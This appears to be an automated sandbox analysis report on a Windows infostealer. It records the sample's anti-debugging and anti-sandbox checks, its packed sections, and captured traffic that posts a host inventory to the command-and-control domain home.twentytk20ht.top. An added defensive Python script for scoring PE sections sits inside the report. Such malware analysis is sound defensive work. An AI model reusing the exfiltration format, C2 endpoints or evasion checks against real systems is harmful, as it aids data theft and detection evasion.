
Windows Analysis Report
E6rBvcWFWu.exe

Overview

General Information

Sample name: E6rBvcWFWu.exe (renamed because the original name is a hash value)
Original sample name: b6bf5fb735bf9b5b70a90d2c7eeb2996.exe
Analysis ID: 1580905
MD5: b6bf5fb735bf9b5b70a90d2c7eeb2996
SHA1: e558c73bd203dc9db3f548b9631715d281d5fc2e
SHA256: cba47d50bdd548bb66bcb87510fdcc8893e53d4077fa626a0c29d83536439b6f
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • E6rBvcWFWu.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\E6rBvcWFWu.exe" MD5: B6BF5FB735BF9B5B70A90D2C7EEB2996)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: E6rBvcWFWu.exe | Avira: detected
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0 | Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U | Avira URL Cloud: Label: malware
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | Avira URL Cloud: Label: malware
Source: E6rBvcWFWu.exe | VirusTotal: Detection: 65%
Source: E6rBvcWFWu.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: E6rBvcWFWu.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_0069DCF0
Source: E6rBvcWFWu.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_006DA5B0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_006DA7F0 (listed twice in the report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_006DA7F0 (listed twice in the report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_006DA7F0 (listed twice in the report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_006DB560
Source: E6rBvcWFWu.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_0067255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_006729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_006729FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */* | Content-Type: application/json | Content-Length: 501311 | Data Ascii (decoded from the report's hex dump, which is truncated at this point): { "ip": "8.46.123.189", "current_time": "1735214544", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name...
Source: global traffic | HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences in the report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_0073A8C0 recvfrom | 0_2_0073A8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknown | HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1 | Host: home.twentytk20ht.top | Accept: */* | Content-Type: application/json | Content-Length: 501311 | Data Ascii (decoded from the report's hex dump, which is truncated at this point): { "ip": "8.46.123.189", "current_time": "1735214544", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name...
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Thu, 26 Dec 2024 12:02:33 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Server: nginx/1.22.1 | Date: Thu, 26 Dec 2024 12:02:35 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: E6rBvcWFWu.exe, 00000000.00000002.1555959761.0000000001A7A000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1516018473.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515970182.0000000001A73000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: E6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0
Source: E6rBvcWFWu.exe, 00000000.00000003.1515251616.0000000001A84000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1556041861.0000000001A85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: E6rBvcWFWu.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: E6rBvcWFWu.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: E6rBvcWFWu.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719

System Summary

Source: E6rBvcWFWu.exe | Static PE information: section name: (blank in report)
Source: E6rBvcWFWu.exe | Static PE information: section name: .idata
Source: E6rBvcWFWu.exe | Static PE information: section name: (blank in report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code functions: 0_3_01AE85D1, 0_3_01ADA4A1, 0_3_01AE5A8B (each listed twice in the report)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code functions: 0_2_006805B0, 0_2_00686FA0, 0_2_006AF100, 0_2_0073B180, 0_2_007400E0, 0_2_009FE030, 0_2_006D6210, 0_2_0073C320, 0_2_00740420, 0_2_009C4410, 0_2_0067E620, 0_2_0073C770, 0_2_009F4780, 0_2_006DA7F0, 0_2_009D6730, 0_2_0067A960, 0_2_00684940, 0_2_0072C900, 0_2_00846AC0, 0_2_0092AAC0, 0_2_009E8BF0, 0_2_0092AB2C, 0_2_0067CBB0, 0_2_00804B60, 0_2_009FCC70, 0_2_00830D80, 0_2_009ECD80, 0_2_009F4D40, 0_2_0098AE30, 0_2_009C2F90, 0_2_00694F70, 0_2_0073EF90, 0_2_00738F90, 0_2_006810E6, 0_2_009DD430, 0_2_009E35B0, 0_2_009C56D0, 0_2_00A01780, 0_2_00729880, 0_2_009C9920, 0_2_009F3A70, 0_2_009E1BD0, 0_2_006B1BE0, 0_2_00929C80, 0_2_009D7CC0, 0_2_00685DB0, 0_2_00683ED0, 0_2_00695EB0, 0_2_009F9FE0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006775A0 appears 702 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 0084CBC0 appears 104 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006B4FD0 appears 290 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006B4F40 appears 337 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006B5340 appears 50 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 007544A0 appears 76 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 0068CCD0 appears 54 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006773F0 appears 113 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 0067C960 appears 37 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 0067CAA0 appears 61 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006771E0 appears 47 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 00827220 appears 103 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 0068CD40 appears 80 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: String function: 006B50A0 appears 101 times
Source: E6rBvcWFWu.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: E6rBvcWFWu.exe | Static PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_0067255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Code function: 0_2_006729FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_006729FF
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 reads listed in the report)
Source: E6rBvcWFWu.exe | VirusTotal: Detection: 65%
Source: E6rBvcWFWu.exe | ReversingLabs: Detection: 71%
Source: E6rBvcWFWu.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: E6rBvcWFWu.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | Sections loaded (in load order): apphelp.dll, winmm.dll, iphlpapi.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, uxtheme.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, kernel.appcore.dll
Source: E6rBvcWFWu.exe | Static file information: File size 4478464 > 1048576
Source: E6rBvcWFWu.exe | Static PE information: Raw size of (blank-named section) is bigger than: 0x100000 < 0x283400
Source: E6rBvcWFWu.exe | Static PE information: Raw size of xyfieepk is bigger than: 0x100000 < 0x1be600

Data Obfuscation

Source: C:\Users\user\Desktop\E6rBvcWFWu.exeUnpacked PE file: 0.2.E6rBvcWFWu.exe.670000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyfieepk:EW;lpcplxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyfieepk:EW;lpcplxjb:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: E6rBvcWFWu.exeStatic PE information: real checksum: 0x44e278 should be: 0x44f8e8
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: E6rBvcWFWu.exeStatic PE information: section name: .idata
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: E6rBvcWFWu.exeStatic PE information: section name: xyfieepk
Source: E6rBvcWFWu.exeStatic PE information: section name: lpcplxjb
Source: E6rBvcWFWu.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADABEC push eax; retf 0_3_01ADABF5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE05E5 pushfd ; ret 0_3_01AE05F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE9FD0 push eax; ret 0_3_01AE9FD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADF419 push es; retf 0_3_01ADF41A
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE724C push eax; retn 0000h0_3_01AE724D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADABEC push eax; retf 0_3_01ADABF5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE05E5 pushfd ; ret 0_3_01AE05F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE9FD0 push eax; ret 0_3_01AE9FD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADF419 push es; retf 0_3_01ADF41A
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE724C push eax; retn 0000h0_3_01AE724D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_009F41D0 push eax; mov dword ptr [esp], edx 0_2_009F41D5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_006F2340 push eax; mov dword ptr [esp], 00000000h 0_2_006F2343
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_0072C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0072C743
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_006B0AC0 push eax; mov dword ptr [esp], 00000000h 0_2_006B0AC4
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_006D1430 push eax; mov dword ptr [esp], 00000000h 0_2_006D1433
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_006F39A0 push eax; mov dword ptr [esp], 00000000h 0_2_006F39A3
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_006CDAD0 push eax; mov dword ptr [esp], edx 0_2_006CDAD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Code function: 0_2_009F9F40 push dword ptr [eax+04h]; ret 0_2_009F9F6F
Source: E6rBvcWFWu.exe Static PE information: section name: xyfieepk entropy: 7.9542694260581
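The section-name and entropy findings above (a blank name, random-looking names such as xyfieepk and lpcplxjb, .taggant, and one section at 7.95 bits per byte) are the classic static fingerprint of a packed executable. The script below is an added example, not part of the Joe Sandbox report, that reproduces those checks with nothing but the Python standard library: it walks the DOS header, PE signature, COFF header and section table by hand, computes Shannon entropy per section, and raises the same kinds of findings. The list of "standard" section names, the 7.2-bit threshold, the 512-byte minimum size, and the constructed PE skeleton used as input are all assumptions of this example; the skeleton carries only headers and section bodies and is not a loadable image.

```python
import math
import struct

# Names a linker normally emits (assumed list, extend to taste); anything else is worth a second look.
STANDARD_SECTIONS = {
    b".text", b".rdata", b".data", b".idata", b".edata", b".pdata",
    b".rsrc", b".reloc", b".bss", b".tls", b".CRT", b".gfids",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table (40-byte entries)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        chars, = struct.unpack_from("<I", pe, off + 36)
        sections.append({
            "name": name,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]),
            "rwx": bool(chars & IMAGE_SCN_MEM_WRITE) and bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return sections


def triage(pe: bytes, entropy_threshold: float = 7.2):
    """Findings in the spirit of the packer signatures above; the threshold is an assumption."""
    findings = []
    for s in parse_sections(pe):
        name = s["name"]
        if not name or not all(0x21 <= c <= 0x7E for c in name):
            findings.append(("special-chars-or-empty-name", name))
        elif name not in STANDARD_SECTIONS:
            findings.append(("non-standard-name", name))
        if s["raw_size"] >= 512 and s["entropy"] >= entropy_threshold:
            findings.append(("high-entropy", name))
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append(("unpack-target", name))   # empty on disk, filled at run time
        if s["rwx"]:
            findings.append(("writable-and-executable", name))
    return findings


def build_test_pe(specs):
    """Constructed, non-loadable PE32 skeleton with just enough headers to exercise the parser.
    specs: list of (name, raw body, section characteristics, virtual size)."""
    n = len(specs)
    hdr_len = 0x40 + 4 + 20 + 0xE0 + 40 * n
    data_start = (hdr_len + 0x1FF) & ~0x1FF                              # 512-byte file alignment
    img = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))      # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x102)
    img += b"\0" * 0xE0                                                   # optional header, zeroed
    bodies, ptr = bytearray(), data_start
    for name, body, chars, vsize in specs:
        raw = (len(body) + 0x1FF) & ~0x1FF
        img += name.ljust(8, b"\0")[:8]
        img += struct.pack("<IIIIIIHHI", vsize, 0x1000, raw, ptr if raw else 0, 0, 0, 0, 0, chars)
        bodies += body.ljust(raw, b"\0")
        ptr += raw
    img += b"\0" * (data_start - len(img))
    return bytes(img + bodies)


# Constructed sample mirroring the report's section list: a blank name, a random-looking
# packed section, a normal .text and the non-standard .taggant.
SAMPLE_PE = build_test_pe([
    (b"",         b"",                        0xE0000080, 0x30000),   # unpack target, RWX
    (b"xyfieepk", bytes(range(256)) * 16,     0x40000040, 0x1000),    # entropy exactly 8.0
    (b".text",    b"\x55\x8b\xec\xc3" * 256,  0x60000020, 0x400),
    (b".taggant", b"TAGG" * 16,               0x42000040, 0x40),
])

if __name__ == "__main__":
    for kind, name in triage(SAMPLE_PE):
        print(f"{kind:32s} {name!r}")
```

Run against a real file with `triage(open(path, "rb").read())`. A blank or unprintable section name is a stronger signal than a merely unfamiliar one, since no mainstream linker emits it; a high-entropy section next to an empty section with a large virtual size is the pattern of a packer that decompresses into the empty one at run time, which matches the "Detected unpacking (changes PE section rights)" signature above.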

Boot Survival

Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\E6rBvcWFWu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
